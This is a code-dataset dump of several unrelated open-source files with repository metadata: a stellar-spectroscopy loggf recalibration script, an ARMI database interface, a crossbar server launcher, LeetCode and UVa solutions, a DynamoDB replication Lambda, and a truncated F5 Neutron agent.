#!/usr/bin/env python # -*- coding: utf8 -*- # My imports from __future__ import division import numpy as np import pandas as pd import argparse from utils import _update_par as updateBatch from utils import _run_moog as runMoog from utils import Readmoog from interpolation import interpolator import os def solar_abundance(atom): '''Give atomic number and return solar abundance from Asplund et al. 2009 Input ----- atom : int The atomic number Output ------ abundance : float The solar abundance of the atom ''' if not isinstance(atom, int): raise ValueError('Atomic number need to be an integer') solar = [12.00, 10.93, 1.05, 1.38, 2.70, 8.43, 7.83, 8.69, 4.56, 7.93, 6.24, 7.60, 6.45, 7.51, 5.41, 7.12, 5.50, 6.40, 5.03, 6.34, 3.15, 4.95, 3.93, 5.64, 5.43, 7.47, 4.99, 6.22, 4.19, 4.56, 3.04, 3.65, 2.30, 3.34, 2.54, 3.25, 2.52, 2.87, 2.21, 2.58, 1.46, 1.88, -5.00, 1.75, 0.91, 1.57, 0.94, 1.71, 0.80, 2.04, 1.01, 2.18, 1.55, 2.24, 1.08, 2.18, 1.10, 1.58, 0.72, 1.42, -5.00, 0.96, 0.52, 1.07, 0.30, 1.10, 0.48, 0.92, 0.10, 0.84, 0.10, 0.85, -0.12, 0.85, 0.26, 1.40, 1.38, 1.62, 0.92, 1.17, 0.90, 1.75, 0.65, -5.00, -5.00, -5.00, -5.00, -5.00, -5.00, 0.02, -5.00, -0.54, -5.00, -5.00, -5.00] return solar[atom-1] def recalSingleLine(line, params=None, version=2014, maxiter=40, driver='abfind'): '''Recalibrate a single line and return the new loggf Inputs ------ line : list The line containing (wavelength, element, EP, loggf, EW) in that order params : list/tuple The parameters (Teff, logg, [Fe/H], vt) version : int The version of MOOG driver : str The MOOG driver to use (abfind or ewfind) Output ------ loggf : float The new recalibrated loggf ''' ewdriver = True if driver == 'ewfind' else False fmt = ('%9.3f', '%10.1f', '%9.2f', '%9.3f', '%28.1f') header = 'Wavelength ele EP loggf EW' np.savetxt('temporary.moog', line[:, np.newaxis].T, fmt=fmt, header=header) loggf_old = line[3] a, b = loggf_old-5, loggf_old+5 # extreme values of loggf c = (a+b)/2 for _ in range(maxiter): if c == 0: # Don't evaluate at loggf = 0 c += (abs(a) + abs(b)) / 10 fa = moogAbund(a, ewdriver=ewdriver) fc = moogAbund(c, ewdriver=ewdriver) if fc == 0: return c elif fa*fc < 0: b = c else: a = c c = (a+b)/2 return c if __name__ == '__main__': # pragma: no cover args = _parser() fname = args.input fout1 = 'rawLinelist/%s' % args.output fout2 = 'linelist/%s' % args.output.replace('.ares', '.moog') lines = pd.read_csv(fname, skiprows=2, delimiter=r'\s+', names=['WL', 'num', 'EP', 'loggf', 'ele', 'EW']) if args.parameters is None: params = [5777, 4.44, 0.00, 1.00] else: params = map(float, args.parameters) params[0] = int(params[0]) interpolator(params=params, atmtype=args.model, save=True) cols = ['WL', 'num', 'EP', 'loggf', 'EW'] fmt2 = ('%9.3f', '%10.1f', '%9.2f', '%9.3f', '%28.1f') header1 = 'WL num E.P. 
loggf ele EWsun\n' header1 += '------- ---- ---- ------ ---- -----' header2 = 'Wavelength ele EP loggf EW' x = lines[cols].values[0][:, np.newaxis].T np.savetxt('temporary.moog', x, fmt=fmt2, header=header2) options = {'driver': args.driver, 'damping': args.damping} updateBatch(line_list='temporary.moog', **options) newloggf = np.zeros(lines.shape[0]) for i, line in enumerate(lines[cols].values): print 'Wavelength: %.3f' % line[0] print 'Old loggf: %.3f' % line[3] zz = recalSingleLine(line, params=params, version=args.moogversion, driver=args.driver) zz = np.log10(zz) if zz > 0 else zz newloggf[i] = zz print 'New loggf: %.3f\n' % newloggf[i] lines['newloggf'] = pd.Series(newloggf) X = lines[['WL', 'num', 'EP', 'newloggf', 'ele', 'EW']] fmt1 = ('%7.2f', '%7.1f', '%9.2f', '%10.3f', '%10s', '%9.1f') print 'Saving results to: %s' % fout1 np.savetxt(fout1, X, fmt=fmt1, header=header1, comments='') X = lines[['WL', 'num', 'EP', 'newloggf', 'EW']] print 'Saving results to: %s' % fout2 np.savetxt(fout2, X, fmt=fmt2, header=header2) os.remove('temporary.moog')
37.04908
133
0.560689
#!/usr/bin/env python # -*- coding: utf8 -*- # My imports from __future__ import division import numpy as np import pandas as pd import argparse from utils import _update_par as updateBatch from utils import _run_moog as runMoog from utils import Readmoog from interpolation import interpolator import os def solar_abundance(atom): '''Give atomic number and return solar abundance from Asplund et al. 2009 Input ----- atom : int The atomic number Output ------ abundance : float The solar abundance of the atom ''' if not isinstance(atom, int): raise ValueError('Atomic number need to be an integer') solar = [12.00, 10.93, 1.05, 1.38, 2.70, 8.43, 7.83, 8.69, 4.56, 7.93, 6.24, 7.60, 6.45, 7.51, 5.41, 7.12, 5.50, 6.40, 5.03, 6.34, 3.15, 4.95, 3.93, 5.64, 5.43, 7.47, 4.99, 6.22, 4.19, 4.56, 3.04, 3.65, 2.30, 3.34, 2.54, 3.25, 2.52, 2.87, 2.21, 2.58, 1.46, 1.88, -5.00, 1.75, 0.91, 1.57, 0.94, 1.71, 0.80, 2.04, 1.01, 2.18, 1.55, 2.24, 1.08, 2.18, 1.10, 1.58, 0.72, 1.42, -5.00, 0.96, 0.52, 1.07, 0.30, 1.10, 0.48, 0.92, 0.10, 0.84, 0.10, 0.85, -0.12, 0.85, 0.26, 1.40, 1.38, 1.62, 0.92, 1.17, 0.90, 1.75, 0.65, -5.00, -5.00, -5.00, -5.00, -5.00, -5.00, 0.02, -5.00, -0.54, -5.00, -5.00, -5.00] return solar[atom-1] def recalSingleLine(line, params=None, version=2014, maxiter=40, driver='abfind'): '''Recalibrate a single line and return the new loggf Inputs ------ line : list The line containing (wavelength, element, EP, loggf, EW) in that order params : list/tuple The parameters (Teff, logg, [Fe/H], vt) version : int The version of MOOG driver : str The MOOG driver to use (abfind or ewfind) Output ------ loggf : float The new recalibrated loggf ''' def moogAbund(loggf, ewdriver=False): line[3] = loggf np.savetxt('temporary.moog', line[:, np.newaxis].T, fmt=fmt, header=header) runMoog() if ewdriver: d = np.loadtxt('summary.out', skiprows=5, usecols=(6,)) out = d-line[4] else: m = Readmoog(params=params, version=version) _, abund = m.elements() solar = solar_abundance(int(line[1])) out = round(abund[0] - solar, 3) return out ewdriver = True if driver == 'ewfind' else False fmt = ('%9.3f', '%10.1f', '%9.2f', '%9.3f', '%28.1f') header = 'Wavelength ele EP loggf EW' np.savetxt('temporary.moog', line[:, np.newaxis].T, fmt=fmt, header=header) loggf_old = line[3] a, b = loggf_old-5, loggf_old+5 # extreme values of loggf c = (a+b)/2 for _ in range(maxiter): if c == 0: # Don't evaluate at loggf = 0 c += (abs(a) + abs(b)) / 10 fa = moogAbund(a, ewdriver=ewdriver) fc = moogAbund(c, ewdriver=ewdriver) if fc == 0: return c elif fa*fc < 0: b = c else: a = c c = (a+b)/2 return c def _parser(): parser = argparse.ArgumentParser(description='Recalibrate the loggf for a set of settings') parser.add_argument('input', help='Input linelist from rawLinelist folder') parser.add_argument('output', help='Name of output file (saved in rawLinelist)') parser.add_argument('-m', '--model', help='Model atmosphere', default='kurucz95', choices=['kurucz95', 'apogee_kurucz', 'marcs']) parser.add_argument('-v', '--moogversion', help='MOOG version', default=2014) parser.add_argument('-d', '--damping', help='Damping to be used in MOOG', default=1, choices=map(str, [1, 2])) parser.add_argument('-dr', '--driver', help='Which driver to use', default='abfind', choices=['abfind', 'ewfind']) parser.add_argument('-p', '--parameters', help='Atmospheric parameters, Teff, logg, [Fe/H], vt', nargs='+', default=None) args = parser.parse_args() return args if __name__ == '__main__': # pragma: no cover args = _parser() fname = args.input fout1 = 
'rawLinelist/%s' % args.output fout2 = 'linelist/%s' % args.output.replace('.ares', '.moog') lines = pd.read_csv(fname, skiprows=2, delimiter=r'\s+', names=['WL', 'num', 'EP', 'loggf', 'ele', 'EW']) if args.parameters is None: params = [5777, 4.44, 0.00, 1.00] else: params = map(float, args.parameters) params[0] = int(params[0]) interpolator(params=params, atmtype=args.model, save=True) cols = ['WL', 'num', 'EP', 'loggf', 'EW'] fmt2 = ('%9.3f', '%10.1f', '%9.2f', '%9.3f', '%28.1f') header1 = 'WL num E.P. loggf ele EWsun\n' header1 += '------- ---- ---- ------ ---- -----' header2 = 'Wavelength ele EP loggf EW' x = lines[cols].values[0][:, np.newaxis].T np.savetxt('temporary.moog', x, fmt=fmt2, header=header2) options = {'driver': args.driver, 'damping': args.damping} updateBatch(line_list='temporary.moog', **options) newloggf = np.zeros(lines.shape[0]) for i, line in enumerate(lines[cols].values): print 'Wavelength: %.3f' % line[0] print 'Old loggf: %.3f' % line[3] zz = recalSingleLine(line, params=params, version=args.moogversion, driver=args.driver) zz = np.log10(zz) if zz > 0 else zz newloggf[i] = zz print 'New loggf: %.3f\n' % newloggf[i] lines['newloggf'] = pd.Series(newloggf) X = lines[['WL', 'num', 'EP', 'newloggf', 'ele', 'EW']] fmt1 = ('%7.2f', '%7.1f', '%9.2f', '%10.3f', '%10s', '%9.1f') print 'Saving results to: %s' % fout1 np.savetxt(fout1, X, fmt=fmt1, header=header1, comments='') X = lines[['WL', 'num', 'EP', 'newloggf', 'EW']] print 'Saving results to: %s' % fout2 np.savetxt(fout2, X, fmt=fmt2, header=header2) os.remove('temporary.moog')
1,357
0
50
1b7145ed8bd88d7082cc74667eb42dcf2d744fe3
3,103
py
Python
armi/bookkeeping/db/database.py
celikten/armi
4e100dd514a59caa9c502bd5a0967fd77fdaf00e
[ "Apache-2.0" ]
1
2021-05-29T16:02:31.000Z
2021-05-29T16:02:31.000Z
armi/bookkeeping/db/database.py
celikten/armi
4e100dd514a59caa9c502bd5a0967fd77fdaf00e
[ "Apache-2.0" ]
null
null
null
armi/bookkeeping/db/database.py
celikten/armi
4e100dd514a59caa9c502bd5a0967fd77fdaf00e
[ "Apache-2.0" ]
null
null
null
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from typing import Generator, Tuple

from armi.settings import caseSettings
from armi.reactor import systemLayoutInput


class Database:
    """Abstract class defining the common interface for all Database implementations.

    Notes
    -----
    This is a pretty anemic set of interfaces, since the different implementations can
    vary wildly. For now these are the bare minimum interfaces that should be needed to
    convert one Database format to another, and serve as a common ancestor."""

    # Cannot annotate type, because cannot import blueprints, because blueprints cannot
    # be imported until after plugins are registered, and this module gets imported by
    # plugins as they are being registered.

    def genTimeSteps(self) -> Generator[Tuple[int, int], None, None]:
        """Get a sequence of tuples (cycle, node) that are contained in the database."""
        raise NotImplementedError()

    def genAuxiliaryData(self, ts: Tuple[int, int]) -> Generator[str, None, None]:
        """
        Get a sequence of auxiliary dataset/group names for the passed time step.

        Returns
        -------
        Generator[str]
            A generator that produces **absolute** paths to the auxiliary data. Absolute
            names make it easier for a database version-agnostic converter to find the
            actual data.
        """
        raise NotImplementedError()

    def getAuxiliaryDataPath(self, ts: Tuple[int, int], name: str) -> str:
        """
        Get a string describing a path to an auxiliary data location.

        Parameters
        ----------
        ts
            The time step that the auxiliary data belongs to

        name
            The name of the auxiliary data

        Returns
        -------
        str
            An absolute location for storing auxiliary data with the given name for the
            given time step
        """
        raise NotImplementedError()
34.865169
88
0.682565
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from typing import Generator, Tuple

from armi.settings import caseSettings
from armi.reactor import systemLayoutInput


class Database:
    """Abstract class defining the common interface for all Database implementations.

    Notes
    -----
    This is a pretty anemic set of interfaces, since the different implementations can
    vary wildly. For now these are the bare minimum interfaces that should be needed to
    convert one Database format to another, and serve as a common ancestor."""

    def loadCS(self) -> caseSettings.Settings:
        raise NotImplementedError()

    # Cannot annotate type, because cannot import blueprints, because blueprints cannot
    # be imported until after plugins are registered, and this module gets imported by
    # plugins as they are being registered.
    def loadBlueprints(self):
        raise NotImplementedError()

    def loadGeometry(self) -> systemLayoutInput.SystemLayoutInput:
        raise NotImplementedError()

    def genTimeSteps(self) -> Generator[Tuple[int, int], None, None]:
        """Get a sequence of tuples (cycle, node) that are contained in the database."""
        raise NotImplementedError()

    def genAuxiliaryData(self, ts: Tuple[int, int]) -> Generator[str, None, None]:
        """
        Get a sequence of auxiliary dataset/group names for the passed time step.

        Returns
        -------
        Generator[str]
            A generator that produces **absolute** paths to the auxiliary data. Absolute
            names make it easier for a database version-agnostic converter to find the
            actual data.
        """
        raise NotImplementedError()

    def getAuxiliaryDataPath(self, ts: Tuple[int, int], name: str) -> str:
        """
        Get a string describing a path to an auxiliary data location.

        Parameters
        ----------
        ts
            The time step that the auxiliary data belongs to

        name
            The name of the auxiliary data

        Returns
        -------
        str
            An absolute location for storing auxiliary data with the given name for the
            given time step
        """
        raise NotImplementedError()

    def writeInputsToDB(self, cs, csString=None, geomString=None, bpString=None):
        raise NotImplementedError()

    def readInputsFromDB(self):
        raise NotImplementedError()

    def writeToDB(self, reactor, statePointName=None):
        raise NotImplementedError()

    def close(self):
        raise NotImplementedError()
404
0
188
eb785d59f66731316d04178e89fe3c2b7adfe88a
7,697
py
Python
src/kogniserver/adm.py
aleneum/rsb-wamp-bridge
4c6401f9f1997294b5891fa814e700986612ebdb
[ "MIT" ]
null
null
null
src/kogniserver/adm.py
aleneum/rsb-wamp-bridge
4c6401f9f1997294b5891fa814e700986612ebdb
[ "MIT" ]
2
2016-08-05T13:52:45.000Z
2016-08-05T14:16:42.000Z
src/kogniserver/adm.py
aleneum/kogniserver
4c6401f9f1997294b5891fa814e700986612ebdb
[ "MIT" ]
null
null
null
import argparse from os import makedirs from os.path import abspath, exists, join, dirname, expanduser import re import subprocess import time import json import threading import socket import sys CONFIG_JSON = """ { "version": 2, "controller": {}, "workers": [ { "transports": [ { "paths": { "ws": { "type": "websocket" }, "/": { "directory": ".", "type": "static" }, "proto": { "directory": ".", "type": "static" } }, "endpoint": { "type": "tcp", "port": 8181, "tls": { "key": "server.key", "certificate": "server.crt" } }, "type": "web" } ], "type": "router", "options": { "pythonpath": [""] }, "realms": [ { "name": "realm1", "roles": [ { "name": "anonymous", "permissions": [ { "uri": "", "match": "prefix", "allow": { "call": true, "register": true, "publish": true, "subscribe": true }, "disclose": { "caller": false, "publisher": false }, "cache": true } ] } ] } ] } ] } """ if __name__ == '__main__': main_entry()
33.176724
121
0.509809
import argparse from os import makedirs from os.path import abspath, exists, join, dirname, expanduser import re import subprocess import time import json import threading import socket import sys def run_crossbar(config_path, keep_alive): ret = subprocess.call(['crossbar', 'status']) if ret == 0 and not keep_alive: subprocess.call(['crossbar', 'stop']) if ret != 0 or not keep_alive: cmd = ['crossbar', 'start', '--config=%s' % config_path] subprocess.call(cmd) def main_entry(args=None): parser = argparse.ArgumentParser() parser.add_argument('-f', '--force', help='overwrite config file if it already exists', action='store_true') parser.add_argument('-k', '--keep-alive', help='use existing crossbar instance', action='store_true') parser.add_argument('-c', '--config', help='location of the config file') parser.add_argument('-g', '--generate', help='only generate config file (with default options)', action='store_true') args = sys.argv[1:] if args is None else args args = parser.parse_args(args) pwd = abspath(__file__) elems = re.compile('[\\\\/]+').split(pwd) if 'site-packages' in elems: idx = elems.index('site-packages') elems = elems[:idx-2] else: elems = elems[:-1] prefix = join("/", *elems) serve_path = join(prefix, "var/www/kogniserver") config_path = join(prefix, 'etc/crossbar/config.json') if not args.config else args.config choice = 'n' if exists(config_path) is False: input_valid = False if not args.generate else True while not input_valid: choice = raw_input("config.json for crossbar does not exists. Should a default one be created " "at %s? [y]/n:" % config_path) or 'y' if choice not in ['y', 'n']: print("please enter 'y' or 'n'.") else: input_valid = True if choice in 'y' or args.force: input_valid = False if not args.generate else True while not input_valid: serve_path = raw_input("Please enter the directory from which " "files should be served [%s]:" % serve_path) or serve_path serve_path = expanduser(serve_path) if not exists(serve_path): choice = raw_input("%s does not exist. Should it be created? [y]/n: " % serve_path) or 'y' if choice not in ['y', 'n']: print("please enter 'y' or 'n'.") elif choice == 'y': makedirs(serve_path) input_valid = True else: input_valid = True protopath = join(prefix, 'share/rst0.17/proto') input_valid = False if not args.generate else True while not input_valid: protopath = raw_input("Location of proto-files? [%s]:" % protopath) or protopath if not exists(protopath) and not args.generate: choice = raw_input("%s does not exist! " "Do you want to ommit RST in your configuration? [y]/n:" % protopath) or 'y' if choice not in ['y', 'n']: print("please enter 'y' or 'n'.") if choice =='y': input_valid = True protopath = None else: input_valid = True if exists(config_path) and not args.force: print "Config file already exists! Use --force to overwrite." return else: if not exists(dirname(abspath(config_path))): makedirs(dirname(abspath(config_path))) ssl_cert = False input_valid = False if not args.generate else True while not input_valid: ssl_cert = raw_input("Location of TLS certificate (without .crt and .key) if needed. " "Leave empty if not needed:") or ssl_cert input_valid = True if ssl_cert: if not exists(ssl_cert + ".crt"): print("%s does not exist!" 
% (ssl_cert + ".crt")) input_valid = True ssl_cert = False with open(config_path, 'w') as target: j = json.loads(CONFIG_JSON) paths = j['workers'][0]['transports'][0] paths['paths']['/']['directory'] = serve_path if protopath: paths['paths']['proto']['directory'] = protopath else: del paths['paths']['proto'] if ssl_cert: paths['endpoint']['tls']['key'] = ssl_cert + '.key' paths['endpoint']['tls']['certificate'] = ssl_cert + '.crt' else: del paths['endpoint']['tls'] json.dump(j, target, indent=4) # In a dry generation run we can exit here if args.generate: return t1 = threading.Thread(target=run_crossbar, args=(config_path, args.keep_alive,)) t1.setDaemon(True) t1.start() while not check_server('localhost', 8181): time.sleep(0.5) with open(config_path) as crossbar_config: j = json.load(crossbar_config) ssl_cert = None if 'tls' in j['workers'][0]['transports'][0]['endpoint']: ssl_cert = j['workers'][0]['transports'][0]['endpoint']['tls']['certificate'] try: # async cannot deal with ssl yet and importing the runner # already sets the environment to asyncio if ssl_cert: raise RuntimeError from .async import main_entry as server_main_entry except RuntimeError: # will be used if a) twisted has been used before or if an ssl_cert should be used from .twist import main_entry as server_main_entry server_main_entry(ssl_cert) def check_server(address, port): # Create a TCP socket s = socket.socket() try: s.connect((address, port)) # print "Connected to %s on port %s" % (address, port) s.close() return True except socket.error, e: # print "Connection to %s on port %s failed: %s" % (address, port, e) return False CONFIG_JSON = """ { "version": 2, "controller": {}, "workers": [ { "transports": [ { "paths": { "ws": { "type": "websocket" }, "/": { "directory": ".", "type": "static" }, "proto": { "directory": ".", "type": "static" } }, "endpoint": { "type": "tcp", "port": 8181, "tls": { "key": "server.key", "certificate": "server.crt" } }, "type": "web" } ], "type": "router", "options": { "pythonpath": [""] }, "realms": [ { "name": "realm1", "roles": [ { "name": "anonymous", "permissions": [ { "uri": "", "match": "prefix", "allow": { "call": true, "register": true, "publish": true, "subscribe": true }, "disclose": { "caller": false, "publisher": false }, "cache": true } ] } ] } ] } ] } """ if __name__ == '__main__': main_entry()
5,950
0
69
d0fce2cb257f939d5dd37e46b222ea6b9fa3b758
369
py
Python
LeetcodeAlgorithms/315. Count of Smaller Numbers After Self/count-of-smaller-numbers-after-self.py
Fenghuapiao/PyLeetcode
d804a62643fe935eb61808196a2c093ea9583654
[ "MIT" ]
3
2019-08-20T06:54:38.000Z
2022-01-07T12:56:46.000Z
LeetcodeAlgorithms/315. Count of Smaller Numbers After Self/count-of-smaller-numbers-after-self.py
yhangf/PyLeetcode
d804a62643fe935eb61808196a2c093ea9583654
[ "MIT" ]
null
null
null
LeetcodeAlgorithms/315. Count of Smaller Numbers After Self/count-of-smaller-numbers-after-self.py
yhangf/PyLeetcode
d804a62643fe935eb61808196a2c093ea9583654
[ "MIT" ]
2
2018-11-01T16:10:34.000Z
2020-06-02T03:24:43.000Z
import bisect
26.357143
47
0.468835
import bisect


class Solution(object):
    def countSmaller(self, nums):
        """
        :type nums: List[int]
        :rtype: List[int]
        """
        ans = []
        bst = []
        for num in reversed(nums):
            idx = bisect.bisect_left(bst, num)
            ans.append(idx)
            bisect.insort(bst, num)
        return ans[::-1]
0
333
22
8c8034428e29fd160cf8e41c0c7d98c8aa53bb4b
1,867
py
Python
10205/10205.py
Keilan/uva
4218328466c3ab2fdf34cdf45fc7a8dea90964bc
[ "MIT" ]
null
null
null
10205/10205.py
Keilan/uva
4218328466c3ab2fdf34cdf45fc7a8dea90964bc
[ "MIT" ]
null
null
null
10205/10205.py
Keilan/uva
4218328466c3ab2fdf34cdf45fc7a8dea90964bc
[ "MIT" ]
null
null
null
import sys

shuffle()
28.723077
99
0.547938
import sys


class Card:
    def __init__(self, rank, suit):
        self.rank = rank
        self.suit = suit

    @classmethod
    def from_position(cls, position):
        """
        Given a number from 1 to 52, creates the card in the correct position assuming the deck
        is sorted by alphabetical suits and then in ace-high ranks.
        """
        suits = ['Clubs', 'Diamonds', 'Hearts', 'Spades']
        ranks = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'Jack', 'Queen', 'King', 'Ace']
        suit = suits[(position-1) // 13]
        rank = ranks[(position-1) % 13]
        return cls(rank, suit)

    def __repr__(self):
        return '{} of {}'.format(self.rank, self.suit)


def shuffle():
    num_cases = int(sys.stdin.readline())
    sys.stdin.readline()  # Skip blank line

    for case_num in range(num_cases):
        if case_num != 0:
            print()  # Blank line

        # Read input
        num_shuffles = int(sys.stdin.readline())

        # Read shuffles
        shuffles = []
        count = num_shuffles * 52
        while count:
            data = [int(i) for i in sys.stdin.readline().split()]
            count -= len(data)
            shuffles.extend(data)
        shuffles = [shuffles[x:x+52] for x in range(0, len(shuffles), 52)]  # Split into sets of 52

        result = list(range(1, 52+1))

        # Read shuffles to apply until we reach a blank line
        line = sys.stdin.readline()
        while not line.isspace() and line != '':
            shuffle = shuffles[int(line) - 1]

            # Apply the shuffle
            previous = result.copy()
            for i, new_position in enumerate(shuffle):
                result[i] = previous[new_position-1]

            line = sys.stdin.readline()

        # Print card names
        for idx in result:
            print(Card.from_position(idx))


shuffle()
1,243
553
46
4f1c141f04a988a04635609952303d8c99c330a8
1,275
py
Python
design-patterns/ddbreplica_lambda.py
weisisheng/amazon-dynamodb-labs
76b9b72b3d16bb7b93e313c48dc8efcd981e18f7
[ "Apache-2.0" ]
109
2020-01-17T05:24:10.000Z
2022-03-18T18:31:10.000Z
design-patterns/ddbreplica_lambda.py
weisisheng/amazon-dynamodb-labs
76b9b72b3d16bb7b93e313c48dc8efcd981e18f7
[ "Apache-2.0" ]
41
2020-01-22T21:18:08.000Z
2022-02-16T19:49:43.000Z
design-patterns/ddbreplica_lambda.py
weisisheng/amazon-dynamodb-labs
76b9b72b3d16bb7b93e313c48dc8efcd981e18f7
[ "Apache-2.0" ]
74
2020-01-16T23:07:46.000Z
2022-03-31T11:39:31.000Z
import json
import time
import urllib
import boto3
import traceback
from lab_config import boto_args
from boto3.dynamodb.types import TypeDeserializer
29.651163
79
0.676863
import json
import time
import urllib
import boto3
import traceback
from lab_config import boto_args
from boto3.dynamodb.types import TypeDeserializer


class StreamTypeDeserializer(TypeDeserializer):
    def _deserialize_n(self, value):
        return int(value)

    def _deserialize_b(self, value):
        return value  # Already in Base64


def get_table_name_from_arn(arn):
    return arn.split(':')[5].split('/')[1]


def _lambda_handler(event, context):
    dynamodb = boto3.resource(**boto_args)
    dynamodb_table = dynamodb.Table('logfile_replica')
    ddb_deserializer = StreamTypeDeserializer()
    records = event['Records']

    for record in records:
        ddb = record['dynamodb']
        event_name = record['eventName'].upper()  # INSERT, MODIFY, REMOVE
        if (event_name == 'INSERT') or (event_name == 'MODIFY'):
            if 'NewImage' not in ddb:
                print ('Cannot process stream if it does not contain NewImage')
                continue
            doc_fields = ddb_deserializer.deserialize({'M': ddb['NewImage']})
            item = dynamodb_table.put_item(Item=doc_fields)


def lambda_handler(event, context):
    try:
        return _lambda_handler(event, context)
    except Exception:
        print (traceback.format_exc())
954
26
144
803f3c5cd78d87ab3c97e23ccd0aab8fcc148c64
10,172
py
Python
networking_f5_ml2/plugins/ml2/drivers/mech_f5/agent/f5_agent.py
sapcc/networking-f5-ml2
03739c1362df80510739afbdc937b5ec68591c52
[ "Apache-2.0" ]
null
null
null
networking_f5_ml2/plugins/ml2/drivers/mech_f5/agent/f5_agent.py
sapcc/networking-f5-ml2
03739c1362df80510739afbdc937b5ec68591c52
[ "Apache-2.0" ]
null
null
null
networking_f5_ml2/plugins/ml2/drivers/mech_f5/agent/f5_agent.py
sapcc/networking-f5-ml2
03739c1362df80510739afbdc937b5ec68591c52
[ "Apache-2.0" ]
null
null
null
# Copyright 2016 SAP SE # # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import collections import signal import time import eventlet eventlet.monkey_patch() from oslo_config import cfg from oslo_log import log as logging from neutron.i18n import _LI, _LW import oslo_messaging from oslo_service import loopingcall from neutron.agent.common import polling from neutron.common import config from neutron.agent import rpc as agent_rpc from neutron.common import constants as n_const from neutron.common import rpc as n_rpc from neutron.common import topics from neutron import context from neutron.i18n import _LE from neutron.db import db_base_plugin_v2 as db_base from neutron.plugins.ml2 import db as db_ml2 from networking_f5_ml2.plugins.ml2.drivers.mech_f5 import constants as f5_constants from oslo_utils import importutils LOG = logging.getLogger(__name__) cfg.CONF.import_group('ml2_f5', 'networking_f5_ml2.plugins.ml2.drivers.mech_f5.config')
36.855072
122
0.608238
# Copyright 2016 SAP SE # # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import collections import signal import time import eventlet eventlet.monkey_patch() from oslo_config import cfg from oslo_log import log as logging from neutron.i18n import _LI, _LW import oslo_messaging from oslo_service import loopingcall from neutron.agent.common import polling from neutron.common import config from neutron.agent import rpc as agent_rpc from neutron.common import constants as n_const from neutron.common import rpc as n_rpc from neutron.common import topics from neutron import context from neutron.i18n import _LE from neutron.db import db_base_plugin_v2 as db_base from neutron.plugins.ml2 import db as db_ml2 from networking_f5_ml2.plugins.ml2.drivers.mech_f5 import constants as f5_constants from oslo_utils import importutils LOG = logging.getLogger(__name__) cfg.CONF.import_group('ml2_f5', 'networking_f5_ml2.plugins.ml2.drivers.mech_f5.config') class F5NeutronAgent(): target = oslo_messaging.Target(version='1.4') def __init__(self, quitting_rpc_timeout=None, conf=None, ): self.conf = cfg.CONF cfg.CONF.log_opt_values(LOG, logging.DEBUG) self.agent_conf = self.conf.get('AGENT', {}) self.polling_interval = 10 self.iter_num = 0 self.run_daemon_loop = True self.quitting_rpc_timeout = quitting_rpc_timeout self.catch_sigterm = False self.catch_sighup = False # Stores port update notifications for processing in main rpc loop self.updated_ports = set() # Stores port delete notifications self.deleted_ports = set() self.network_ports = collections.defaultdict(set) self.local_vlan_map = {} self.f5_driver = importutils.import_object(cfg.CONF.f5_bigip_lbaas_device_driver, cfg.CONF) host = self.conf.host self.agent_host = host + ":" + self.f5_driver.agent_id self.f5_driver.agent_host = self.agent_host self.agent_id = 'f5-agent-%s' % host self.setup_rpc() self.db = db_base.NeutronDbPluginV2() self.agent_state = { 'binary': 'neutron-f5-agent', 'host': self.agent_host, 'topic': n_const.L2_AGENT_TOPIC, 'configurations': {}, 'agent_type': f5_constants.F5_AGENT_TYPE, 'start_flag': True} self.connection.consume_in_threads() def port_update(self, context, **kwargs): port = kwargs.get('port') self.updated_ports.add(port['id']) def port_delete(self, context, **kwargs): port_id = kwargs.get('port_id') self.deleted_ports.add(port_id) self.updated_ports.discard(port_id) def network_create(self, context, **kwargs): pass def network_update(self, context, **kwargs): network_id = kwargs['network']['id'] for port_id in self.network_ports[network_id]: # notifications could arrive out of order, if the port is deleted # we don't want to update it anymore if port_id not in self.deleted_ports: self.updated_ports.add(port_id) def network_delete(self, context, **kwargs): pass def _clean_network_ports(self, port_id): for port_set in self.network_ports.values(): if port_id in port_set: port_set.remove(port_id) break def setup_rpc(self): LOG.info(_LI("RPC agent_id: %s"), self.agent_id) self.plugin_rpc = 
agent_rpc.PluginApi(topics.PLUGIN) self.state_rpc = agent_rpc.PluginReportStateAPI(topics.PLUGIN) # RPC network init self.context = context.get_admin_context_without_session() self.context_with_session = context.get_admin_context() # Define the listening consumers for the agent consumers = [[topics.PORT, topics.CREATE], [topics.PORT, topics.UPDATE], [topics.PORT, topics.DELETE], [topics.NETWORK, topics.CREATE], [topics.NETWORK, topics.UPDATE], [topics.NETWORK, topics.DELETE]] self.connection = agent_rpc.create_consumers([self], topics.AGENT, consumers, start_listening=False) report_interval = 30 # self.conf.AGENT.report_interval heartbeat = loopingcall.FixedIntervalLoopingCall(self._report_state) heartbeat.start(interval=report_interval) def _report_state(self): LOG.info(_LI("******** Reporting state via rpc")) try: self.state_rpc.report_state(self.context, self.agent_state) self.agent_state.pop('start_flag', None) except Exception: LOG.exception(_LE("Failed reporting state!")) def _check_and_handle_signal(self): if self.catch_sigterm: LOG.info(_LI("Agent caught SIGTERM, quitting daemon 